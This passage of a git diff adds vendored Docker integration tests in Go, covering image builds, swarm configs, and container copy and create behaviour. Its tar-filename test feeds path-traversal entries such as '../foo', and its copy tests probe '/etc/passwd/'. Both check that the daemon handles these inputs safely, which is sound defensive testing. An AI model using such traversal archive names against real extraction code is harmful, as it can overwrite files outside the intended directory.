"github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/pkg/stdcopy" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestBuildSquashParent(t *testing.T) { + skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild) + + client := testEnv.APIClient() + + dockerfile := ` + FROM busybox + RUN echo hello > /hello + RUN echo world >> /hello + RUN echo hello > /remove_me + ENV HELLO world + RUN rm /remove_me + ` + + // build and get the ID that we can use later for history comparison + ctx := context.Background() + source := fakecontext.New(t, "", fakecontext.WithDockerfile(dockerfile)) + defer source.Close() + + name := "test" + resp, err := client.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + Tags: []string{name}, + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + inspect, _, err := client.ImageInspectWithRaw(ctx, name) + assert.NilError(t, err) + origID := inspect.ID + + // build with squash + resp, err = client.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + Squash: true, + Tags: []string{name}, + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + cid := container.Run(t, ctx, client, + container.WithImage(name), + container.WithCmd("/bin/sh", "-c", "cat /hello"), + ) + reader, err := client.ContainerLogs(ctx, cid, types.ContainerLogsOptions{ + ShowStdout: true, + }) + assert.NilError(t, err) + + actualStdout := new(bytes.Buffer) + actualStderr := ioutil.Discard + _, err = stdcopy.StdCopy(actualStdout, actualStderr, reader) + assert.NilError(t, err) + assert.Check(t, is.Equal(strings.TrimSpace(actualStdout.String()), "hello\nworld")) + + container.Run(t, ctx, client, + container.WithImage(name), + container.WithCmd("/bin/sh", "-c", "[ ! -f /remove_me ]"), + ) + container.Run(t, ctx, client, + container.WithImage(name), + container.WithCmd("/bin/sh", "-c", `[ "$(echo $HELLO)" == "world" ]`), + ) + + origHistory, err := client.ImageHistory(ctx, origID) + assert.NilError(t, err) + testHistory, err := client.ImageHistory(ctx, name) + assert.NilError(t, err) + + inspect, _, err = client.ImageInspectWithRaw(ctx, name) + assert.NilError(t, err) + assert.Check(t, is.Len(testHistory, len(origHistory)+1)) + assert.Check(t, is.Len(inspect.RootFS.Layers, 2)) +} diff --git a/vendor/github.com/docker/docker/integration/build/build_test.go b/vendor/github.com/docker/docker/integration/build/build_test.go new file mode 100644 index 0000000000..25c5e635bd --- /dev/null +++ b/vendor/github.com/docker/docker/integration/build/build_test.go @@ -0,0 +1,460 @@ +package build // import "github.com/docker/docker/integration/build" + +import ( + "archive/tar" + "bytes" + "context" + "encoding/json" + "io" + "io/ioutil" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/jsonmessage" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestBuildWithRemoveAndForceRemove(t *testing.T) { + defer setupTest(t)() + t.Parallel() + cases := []struct { + name string + dockerfile string + numberOfIntermediateContainers int + rm bool + forceRm bool + }{ + { + name: "successful build with no removal", + dockerfile: `FROM busybox + RUN exit 0 + RUN exit 0`, + numberOfIntermediateContainers: 2, + rm: false, + forceRm: false, + }, + { + name: "successful build with remove", + dockerfile: `FROM busybox + RUN exit 0 + RUN exit 0`, + numberOfIntermediateContainers: 0, + rm: true, + forceRm: false, + }, + { + name: "successful build with remove and force remove", + dockerfile: `FROM busybox + RUN exit 0 + RUN exit 0`, + numberOfIntermediateContainers: 0, + rm: true, + forceRm: true, + }, + { + name: "failed build with no removal", + dockerfile: `FROM busybox + RUN exit 0 + RUN exit 1`, + numberOfIntermediateContainers: 2, + rm: false, + forceRm: false, + }, + { + name: "failed build with remove", + dockerfile: `FROM busybox + RUN exit 0 + RUN exit 1`, + numberOfIntermediateContainers: 1, + rm: true, + forceRm: false, + }, + { + name: "failed build with remove and force remove", + dockerfile: `FROM busybox + RUN exit 0 + RUN exit 1`, + numberOfIntermediateContainers: 0, + rm: true, + forceRm: true, + }, + } + + client := request.NewAPIClient(t) + ctx := context.Background() + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + t.Parallel() + dockerfile := []byte(c.dockerfile) + + buff := bytes.NewBuffer(nil) + tw := tar.NewWriter(buff) + assert.NilError(t, tw.WriteHeader(&tar.Header{ + Name: "Dockerfile", + Size: int64(len(dockerfile)), + })) + _, err := tw.Write(dockerfile) + assert.NilError(t, err) + assert.NilError(t, tw.Close()) + resp, err := client.ImageBuild(ctx, buff, types.ImageBuildOptions{Remove: c.rm, ForceRemove: c.forceRm, NoCache: true}) + assert.NilError(t, err) + defer resp.Body.Close() + filter, err := buildContainerIdsFilter(resp.Body) + assert.NilError(t, err) + remainingContainers, err := client.ContainerList(ctx, types.ContainerListOptions{Filters: filter, All: true}) + assert.NilError(t, err) + assert.Equal(t, c.numberOfIntermediateContainers, len(remainingContainers), "Expected %v remaining intermediate containers, got %v", c.numberOfIntermediateContainers, len(remainingContainers)) + }) + } +} + +func buildContainerIdsFilter(buildOutput io.Reader) (filters.Args, error) { + const intermediateContainerPrefix = " ---> Running in " + filter := filters.NewArgs() + + dec := json.NewDecoder(buildOutput) + for { + m := jsonmessage.JSONMessage{} + err := dec.Decode(&m) + if err == io.EOF { + return filter, nil + } + if err != nil { + return filter, err + } + if ix := strings.Index(m.Stream, intermediateContainerPrefix); ix != -1 { + filter.Add("id", strings.TrimSpace(m.Stream[ix+len(intermediateContainerPrefix):])) + } + } +} + +func TestBuildMultiStageParentConfig(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.35"), "broken in earlier versions") + dockerfile := ` + FROM busybox AS stage0 + ENV WHO=parent + WORKDIR /foo + + FROM stage0 + ENV WHO=sibling1 + WORKDIR sub1 + + FROM stage0 + WORKDIR sub2 + ` + ctx := context.Background() + source := fakecontext.New(t, "", fakecontext.WithDockerfile(dockerfile)) + defer source.Close() + + apiclient := testEnv.APIClient() + resp, err := apiclient.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + Tags: []string{"build1"}, + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + image, _, err := apiclient.ImageInspectWithRaw(ctx, "build1") + assert.NilError(t, err) + + assert.Check(t, is.Equal("/foo/sub2", image.Config.WorkingDir)) + assert.Check(t, is.Contains(image.Config.Env, "WHO=parent")) +} + +// Test cases in #36996 +func TestBuildLabelWithTargets(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "test added after 1.38") + bldName := "build-a" + testLabels := map[string]string{ + "foo": "bar", + "dead": "beef", + } + + dockerfile := ` + FROM busybox AS target-a + CMD ["/dev"] + LABEL label-a=inline-a + FROM busybox AS target-b + CMD ["/dist"] + LABEL label-b=inline-b + ` + + ctx := context.Background() + source := fakecontext.New(t, "", fakecontext.WithDockerfile(dockerfile)) + defer source.Close() + + apiclient := testEnv.APIClient() + // For `target-a` build + resp, err := apiclient.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + Tags: []string{bldName}, + Labels: testLabels, + Target: "target-a", + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + image, _, err := apiclient.ImageInspectWithRaw(ctx, bldName) + assert.NilError(t, err) + + testLabels["label-a"] = "inline-a" + for k, v := range testLabels { + x, ok := image.Config.Labels[k] + assert.Assert(t, ok) + assert.Assert(t, x == v) + } + + // For `target-b` build + bldName = "build-b" + delete(testLabels, "label-a") + resp, err = apiclient.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + Tags: []string{bldName}, + Labels: testLabels, + Target: "target-b", + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + image, _, err = apiclient.ImageInspectWithRaw(ctx, bldName) + assert.NilError(t, err) + + testLabels["label-b"] = "inline-b" + for k, v := range testLabels { + x, ok := image.Config.Labels[k] + assert.Assert(t, ok) + assert.Assert(t, x == v) + } +} + +func TestBuildWithEmptyLayers(t *testing.T) { + dockerfile := ` + FROM busybox + COPY 1/ /target/ + COPY 2/ /target/ + COPY 3/ /target/ + ` + ctx := context.Background() + source := fakecontext.New(t, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFile("1/a", "asdf"), + fakecontext.WithFile("2/a", "asdf"), + fakecontext.WithFile("3/a", "asdf")) + defer source.Close() + + apiclient := testEnv.APIClient() + resp, err := apiclient.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + assert.NilError(t, err) +} + +// TestBuildMultiStageOnBuild checks that ONBUILD commands are applied to +// multiple subsequent stages +// #35652 +func TestBuildMultiStageOnBuild(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.33"), "broken in earlier versions") + defer setupTest(t)() + // test both metadata and layer based commands as they may be implemented differently + dockerfile := `FROM busybox AS stage1 +ONBUILD RUN echo 'foo' >somefile +ONBUILD ENV bar=baz + +FROM stage1 +RUN cat somefile # fails if ONBUILD RUN fails + +FROM stage1 +RUN cat somefile` + + ctx := context.Background() + source := fakecontext.New(t, "", + fakecontext.WithDockerfile(dockerfile)) + defer source.Close() + + apiclient := testEnv.APIClient() + resp, err := apiclient.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + }) + + out := bytes.NewBuffer(nil) + assert.NilError(t, err) + _, err = io.Copy(out, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + assert.Check(t, is.Contains(out.String(), "Successfully built")) + + imageIDs, err := getImageIDsFromBuild(out.Bytes()) + assert.NilError(t, err) + assert.Check(t, is.Equal(3, len(imageIDs))) + + image, _, err := apiclient.ImageInspectWithRaw(context.Background(), imageIDs[2]) + assert.NilError(t, err) + assert.Check(t, is.Contains(image.Config.Env, "bar=baz")) +} + +// #35403 #36122 +func TestBuildUncleanTarFilenames(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.37"), "broken in earlier versions") + ctx := context.TODO() + defer setupTest(t)() + + dockerfile := `FROM scratch +COPY foo / +FROM scratch +COPY bar /` + + buf := bytes.NewBuffer(nil) + w := tar.NewWriter(buf) + writeTarRecord(t, w, "Dockerfile", dockerfile) + writeTarRecord(t, w, "../foo", "foocontents0") + writeTarRecord(t, w, "/bar", "barcontents0") + err := w.Close() + assert.NilError(t, err) + + apiclient := testEnv.APIClient() + resp, err := apiclient.ImageBuild(ctx, + buf, + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + }) + + out := bytes.NewBuffer(nil) + assert.NilError(t, err) + _, err = io.Copy(out, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + // repeat with changed data should not cause cache hits + + buf = bytes.NewBuffer(nil) + w = tar.NewWriter(buf) + writeTarRecord(t, w, "Dockerfile", dockerfile) + writeTarRecord(t, w, "../foo", "foocontents1") + writeTarRecord(t, w, "/bar", "barcontents1") + err = w.Close() + assert.NilError(t, err) + + resp, err = apiclient.ImageBuild(ctx, + buf, + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + }) + + out = bytes.NewBuffer(nil) + assert.NilError(t, err) + _, err = io.Copy(out, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + assert.Assert(t, !strings.Contains(out.String(), "Using cache")) +} + +// docker/for-linux#135 +// #35641 +func TestBuildMultiStageLayerLeak(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.37"), "broken in earlier versions") + ctx := context.TODO() + defer setupTest(t)() + + // all commands need to match until COPY + dockerfile := `FROM busybox +WORKDIR /foo +COPY foo . +FROM busybox +WORKDIR /foo +COPY bar . +RUN [ -f bar ] +RUN [ ! -f foo ] +` + + source := fakecontext.New(t, "", + fakecontext.WithFile("foo", "0"), + fakecontext.WithFile("bar", "1"), + fakecontext.WithDockerfile(dockerfile)) + defer source.Close() + + apiclient := testEnv.APIClient() + resp, err := apiclient.ImageBuild(ctx, + source.AsTarReader(t), + types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + }) + + out := bytes.NewBuffer(nil) + assert.NilError(t, err) + _, err = io.Copy(out, resp.Body) + resp.Body.Close() + assert.NilError(t, err) + + assert.Check(t, is.Contains(out.String(), "Successfully built")) +} + +func writeTarRecord(t *testing.T, w *tar.Writer, fn, contents string) { + err := w.WriteHeader(&tar.Header{ + Name: fn, + Mode: 0600, + Size: int64(len(contents)), + Typeflag: '0', + }) + assert.NilError(t, err) + _, err = w.Write([]byte(contents)) + assert.NilError(t, err) +} + +type buildLine struct { + Stream string + Aux struct { + ID string + } +} + +func getImageIDsFromBuild(output []byte) ([]string, error) { + var ids []string + for _, line := range bytes.Split(output, []byte("\n")) { + if len(line) == 0 { + continue + } + entry := buildLine{} + if err := json.Unmarshal(line, &entry); err != nil { + return nil, err + } + if entry.Aux.ID != "" { + ids = append(ids, entry.Aux.ID) + } + } + return ids, nil +} diff --git a/vendor/github.com/docker/docker/integration/build/main_test.go b/vendor/github.com/docker/docker/integration/build/main_test.go new file mode 100644 index 0000000000..fef3909fd5 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/build/main_test.go @@ -0,0 +1,33 @@ +package build // import "github.com/docker/docker/integration/build" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/config/config_test.go b/vendor/github.com/docker/docker/integration/config/config_test.go new file mode 100644 index 0000000000..3cbca23899 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/config/config_test.go @@ -0,0 +1,356 @@ +package config // import "github.com/docker/docker/integration/config" + +import ( + "bytes" + "context" + "encoding/json" + "sort" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/swarm" + "github.com/docker/docker/pkg/stdcopy" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestConfigList(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + + // This test case is ported from the original TestConfigsEmptyList + configs, err := client.ConfigList(ctx, types.ConfigListOptions{}) + assert.NilError(t, err) + assert.Check(t, is.Equal(len(configs), 0)) + + testName0 := "test0-" + t.Name() + testName1 := "test1-" + t.Name() + testNames := []string{testName0, testName1} + sort.Strings(testNames) + + // create config test0 + createConfig(ctx, t, client, testName0, []byte("TESTINGDATA0"), map[string]string{"type": "test"}) + + config1ID := createConfig(ctx, t, client, testName1, []byte("TESTINGDATA1"), map[string]string{"type": "production"}) + + names := func(entries []swarmtypes.Config) []string { + var values []string + for _, entry := range entries { + values = append(values, entry.Spec.Name) + } + sort.Strings(values) + return values + } + + // test by `config ls` + entries, err := client.ConfigList(ctx, types.ConfigListOptions{}) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(names(entries), testNames)) + + testCases := []struct { + filters filters.Args + expected []string + }{ + // test filter by name `config ls --filter name=xxx` + { + filters: filters.NewArgs(filters.Arg("name", testName0)), + expected: []string{testName0}, + }, + // test filter by id `config ls --filter id=xxx` + { + filters: filters.NewArgs(filters.Arg("id", config1ID)), + expected: []string{testName1}, + }, + // test filter by label `config ls --filter label=xxx` + { + filters: filters.NewArgs(filters.Arg("label", "type")), + expected: testNames, + }, + { + filters: filters.NewArgs(filters.Arg("label", "type=test")), + expected: []string{testName0}, + }, + { + filters: filters.NewArgs(filters.Arg("label", "type=production")), + expected: []string{testName1}, + }, + } + for _, tc := range testCases { + entries, err = client.ConfigList(ctx, types.ConfigListOptions{ + Filters: tc.filters, + }) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(names(entries), tc.expected)) + + } +} + +func createConfig(ctx context.Context, t *testing.T, client client.APIClient, name string, data []byte, labels map[string]string) string { + config, err := client.ConfigCreate(ctx, swarmtypes.ConfigSpec{ + Annotations: swarmtypes.Annotations{ + Name: name, + Labels: labels, + }, + Data: data, + }) + assert.NilError(t, err) + assert.Check(t, config.ID != "") + return config.ID +} + +func TestConfigsCreateAndDelete(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + + testName := "test_config-" + t.Name() + + // This test case is ported from the original TestConfigsCreate + configID := createConfig(ctx, t, client, testName, []byte("TESTINGDATA"), nil) + + insp, _, err := client.ConfigInspectWithRaw(ctx, configID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Name, testName)) + + // This test case is ported from the original TestConfigsDelete + err = client.ConfigRemove(ctx, configID) + assert.NilError(t, err) + + insp, _, err = client.ConfigInspectWithRaw(ctx, configID) + assert.Check(t, is.ErrorContains(err, "No such config")) +} + +func TestConfigsUpdate(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + + testName := "test_config-" + t.Name() + + // This test case is ported from the original TestConfigsCreate + configID := createConfig(ctx, t, client, testName, []byte("TESTINGDATA"), nil) + + insp, _, err := client.ConfigInspectWithRaw(ctx, configID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.ID, configID)) + + // test UpdateConfig with full ID + insp.Spec.Labels = map[string]string{"test": "test1"} + err = client.ConfigUpdate(ctx, configID, insp.Version, insp.Spec) + assert.NilError(t, err) + + insp, _, err = client.ConfigInspectWithRaw(ctx, configID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test1")) + + // test UpdateConfig with full name + insp.Spec.Labels = map[string]string{"test": "test2"} + err = client.ConfigUpdate(ctx, testName, insp.Version, insp.Spec) + assert.NilError(t, err) + + insp, _, err = client.ConfigInspectWithRaw(ctx, configID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test2")) + + // test UpdateConfig with prefix ID + insp.Spec.Labels = map[string]string{"test": "test3"} + err = client.ConfigUpdate(ctx, configID[:1], insp.Version, insp.Spec) + assert.NilError(t, err) + + insp, _, err = client.ConfigInspectWithRaw(ctx, configID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test3")) + + // test UpdateConfig in updating Data which is not supported in daemon + // this test will produce an error in func UpdateConfig + insp.Spec.Data = []byte("TESTINGDATA2") + err = client.ConfigUpdate(ctx, configID, insp.Version, insp.Spec) + assert.Check(t, is.ErrorContains(err, "only updates to Labels are allowed")) +} + +func TestTemplatedConfig(t *testing.T) { + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + ctx := context.Background() + + referencedSecretName := "referencedsecret-" + t.Name() + referencedSecretSpec := swarmtypes.SecretSpec{ + Annotations: swarmtypes.Annotations{ + Name: referencedSecretName, + }, + Data: []byte("this is a secret"), + } + referencedSecret, err := client.SecretCreate(ctx, referencedSecretSpec) + assert.Check(t, err) + + referencedConfigName := "referencedconfig-" + t.Name() + referencedConfigSpec := swarmtypes.ConfigSpec{ + Annotations: swarmtypes.Annotations{ + Name: referencedConfigName, + }, + Data: []byte("this is a config"), + } + referencedConfig, err := client.ConfigCreate(ctx, referencedConfigSpec) + assert.Check(t, err) + + templatedConfigName := "templated_config-" + t.Name() + configSpec := swarmtypes.ConfigSpec{ + Annotations: swarmtypes.Annotations{ + Name: templatedConfigName, + }, + Templating: &swarmtypes.Driver{ + Name: "golang", + }, + Data: []byte("SERVICE_NAME={{.Service.Name}}\n" + + "{{secret \"referencedsecrettarget\"}}\n" + + "{{config \"referencedconfigtarget\"}}\n"), + } + + templatedConfig, err := client.ConfigCreate(ctx, configSpec) + assert.Check(t, err) + + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithConfig( + &swarmtypes.ConfigReference{ + File: &swarmtypes.ConfigReferenceFileTarget{ + Name: "/" + templatedConfigName, + UID: "0", + GID: "0", + Mode: 0600, + }, + ConfigID: templatedConfig.ID, + ConfigName: templatedConfigName, + }, + ), + swarm.ServiceWithConfig( + &swarmtypes.ConfigReference{ + File: &swarmtypes.ConfigReferenceFileTarget{ + Name: "referencedconfigtarget", + UID: "0", + GID: "0", + Mode: 0600, + }, + ConfigID: referencedConfig.ID, + ConfigName: referencedConfigName, + }, + ), + swarm.ServiceWithSecret( + &swarmtypes.SecretReference{ + File: &swarmtypes.SecretReferenceFileTarget{ + Name: "referencedsecrettarget", + UID: "0", + GID: "0", + Mode: 0600, + }, + SecretID: referencedSecret.ID, + SecretName: referencedSecretName, + }, + ), + swarm.ServiceWithName("svc"), + ) + + var tasks []swarmtypes.Task + waitAndAssert(t, 60*time.Second, func(t *testing.T) bool { + tasks = swarm.GetRunningTasks(t, d, serviceID) + return len(tasks) > 0 + }) + + task := tasks[0] + waitAndAssert(t, 60*time.Second, func(t *testing.T) bool { + if task.NodeID == "" || (task.Status.ContainerStatus == nil || task.Status.ContainerStatus.ContainerID == "") { + task, _, _ = client.TaskInspectWithRaw(context.Background(), task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus != nil && task.Status.ContainerStatus.ContainerID != "" + }) + + attach := swarm.ExecTask(t, d, task, types.ExecConfig{ + Cmd: []string{"/bin/cat", "/" + templatedConfigName}, + AttachStdout: true, + AttachStderr: true, + }) + + expect := "SERVICE_NAME=svc\n" + + "this is a secret\n" + + "this is a config\n" + assertAttachedStream(t, attach, expect) + + attach = swarm.ExecTask(t, d, task, types.ExecConfig{ + Cmd: []string{"mount"}, + AttachStdout: true, + AttachStderr: true, + }) + assertAttachedStream(t, attach, "tmpfs on /"+templatedConfigName+" type tmpfs") +} + +func assertAttachedStream(t *testing.T, attach types.HijackedResponse, expect string) { + buf := bytes.NewBuffer(nil) + _, err := stdcopy.StdCopy(buf, buf, attach.Reader) + assert.NilError(t, err) + assert.Check(t, is.Contains(buf.String(), expect)) +} + +func waitAndAssert(t *testing.T, timeout time.Duration, f func(*testing.T) bool) { + t.Helper() + after := time.After(timeout) + for { + select { + case <-after: + t.Fatalf("timed out waiting for condition") + default: + } + if f(t) { + return + } + time.Sleep(100 * time.Millisecond) + } +} + +func TestConfigInspect(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + + testName := t.Name() + configID := createConfig(ctx, t, client, testName, []byte("TESTINGDATA"), nil) + + insp, body, err := client.ConfigInspectWithRaw(ctx, configID) + assert.NilError(t, err) + assert.Check(t, is.Equal(insp.Spec.Name, testName)) + + var config swarmtypes.Config + err = json.Unmarshal(body, &config) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(config, insp)) +} diff --git a/vendor/github.com/docker/docker/integration/config/main_test.go b/vendor/github.com/docker/docker/integration/config/main_test.go new file mode 100644 index 0000000000..3c8f0483f2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/config/main_test.go @@ -0,0 +1,33 @@ +package config // import "github.com/docker/docker/integration/config" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/container/copy_test.go b/vendor/github.com/docker/docker/integration/container/copy_test.go new file mode 100644 index 0000000000..241b719eb7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/copy_test.go @@ -0,0 +1,65 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "fmt" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestCopyFromContainerPathDoesNotExist(t *testing.T) { + defer setupTest(t)() + + ctx := context.Background() + apiclient := testEnv.APIClient() + cid := container.Create(t, ctx, apiclient) + + _, _, err := apiclient.CopyFromContainer(ctx, cid, "/dne") + assert.Check(t, client.IsErrNotFound(err)) + expected := fmt.Sprintf("No such container:path: %s:%s", cid, "/dne") + assert.Check(t, is.ErrorContains(err, expected)) +} + +func TestCopyFromContainerPathIsNotDir(t *testing.T) { + defer setupTest(t)() + skip.If(t, testEnv.OSType == "windows") + + ctx := context.Background() + apiclient := testEnv.APIClient() + cid := container.Create(t, ctx, apiclient) + + _, _, err := apiclient.CopyFromContainer(ctx, cid, "/etc/passwd/") + assert.Assert(t, is.ErrorContains(err, "not a directory")) +} + +func TestCopyToContainerPathDoesNotExist(t *testing.T) { + defer setupTest(t)() + skip.If(t, testEnv.OSType == "windows") + + ctx := context.Background() + apiclient := testEnv.APIClient() + cid := container.Create(t, ctx, apiclient) + + err := apiclient.CopyToContainer(ctx, cid, "/dne", nil, types.CopyToContainerOptions{}) + assert.Check(t, client.IsErrNotFound(err)) + expected := fmt.Sprintf("No such container:path: %s:%s", cid, "/dne") + assert.Check(t, is.ErrorContains(err, expected)) +} + +func TestCopyToContainerPathIsNotDir(t *testing.T) { + defer setupTest(t)() + skip.If(t, testEnv.OSType == "windows") + + ctx := context.Background() + apiclient := testEnv.APIClient() + cid := container.Create(t, ctx, apiclient) + + err := apiclient.CopyToContainer(ctx, cid, "/etc/passwd/", nil, types.CopyToContainerOptions{}) + assert.Assert(t, is.ErrorContains(err, "not a directory")) +} diff --git a/vendor/github.com/docker/docker/integration/container/create_test.go b/vendor/github.com/docker/docker/integration/container/create_test.go new file mode 100644 index 0000000000..f94eb4a3fb --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/create_test.go @@ -0,0 +1,303 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "encoding/json" + "fmt" + "strconv" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/network" + ctr "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/oci" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestCreateFailsWhenIdentifierDoesNotExist(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + + testCases := []struct { + doc string + image string + expectedError string + }{ + { + doc: "image and tag", + image: "test456:v1", + expectedError: "No such image: test456:v1", + }, + { + doc: "image no tag", + image: "test456", + expectedError: "No such image: test456", + }, + { + doc: "digest", + image: "sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa", + expectedError: "No such image: sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa", + }, + } + + for _, tc := range testCases { + tc := tc + t.Run(tc.doc, func(t *testing.T) { + t.Parallel() + _, err := client.ContainerCreate(context.Background(), + &container.Config{Image: tc.image}, + &container.HostConfig{}, + &network.NetworkingConfig{}, + "", + ) + assert.Check(t, is.ErrorContains(err, tc.expectedError)) + }) + } +} + +func TestCreateWithInvalidEnv(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + + testCases := []struct { + env string + expectedError string + }{ + { + env: "", + expectedError: "invalid environment variable:", + }, + { + env: "=", + expectedError: "invalid environment variable: =", + }, + { + env: "=foo", + expectedError: "invalid environment variable: =foo", + }, + } + + for index, tc := range testCases { + tc := tc + t.Run(strconv.Itoa(index), func(t *testing.T) { + t.Parallel() + _, err := client.ContainerCreate(context.Background(), + &container.Config{ + Image: "busybox", + Env: []string{tc.env}, + }, + &container.HostConfig{}, + &network.NetworkingConfig{}, + "", + ) + assert.Check(t, is.ErrorContains(err, tc.expectedError)) + }) + } +} + +// Test case for #30166 (target was not validated) +func TestCreateTmpfsMountsTarget(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + client := request.NewAPIClient(t) + + testCases := []struct { + target string + expectedError string + }{ + { + target: ".", + expectedError: "mount path must be absolute", + }, + { + target: "foo", + expectedError: "mount path must be absolute", + }, + { + target: "/", + expectedError: "destination can't be 